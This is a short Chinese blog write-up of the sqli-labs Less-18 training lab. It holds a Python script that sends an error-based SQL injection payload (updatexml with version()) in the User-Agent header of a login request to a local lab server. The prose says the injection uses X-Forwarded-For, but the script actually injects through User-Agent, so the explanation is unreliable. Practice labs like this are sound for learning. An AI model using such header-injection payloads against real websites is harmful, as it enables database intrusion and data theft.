[sqli-labs]Less-18(HTTP头注入(X-Forwarded-For) , 报错注入)

HTTP头注入
利用XFF头
这里可以利用的原因是 : 网站将XFF头信息插入数据库 , 而这个信息是访问者可以控制的
同样利用报错注入 , 将数据回显

import requests

url = "http://127.0.0.1/Less-18/"

postDate = {
    'uname':'admin',
    'passwd':'1'
}

headers = {
    'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Encoding':'gzip, deflate, br',
    'Accept-Language':'zh-CN,zh;q=0.8,en;q=0.6',
    'Cache-Control':'max-age=0',
    'Connection':'keep-alive',
    'Content-Type':'application/x-www-form-urlencoded',
    'Host':'127.0.0.1',
    'X-Forwarded-For':'8.8.8.8',
    'Origin':'http://127.0.0.1',
    'Referer':'http://127.0.0.1/Less-18/',
    'Upgrade-Insecure-Requests':'1',
    'User-Agent':'\',updatexml(1,concat(0x5e,version(),0x5e),1),\''
}

content = (requests.post(url, data=postDate, headers=headers).text)
print(content)
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

相关阅读更多精彩内容

友情链接更多精彩内容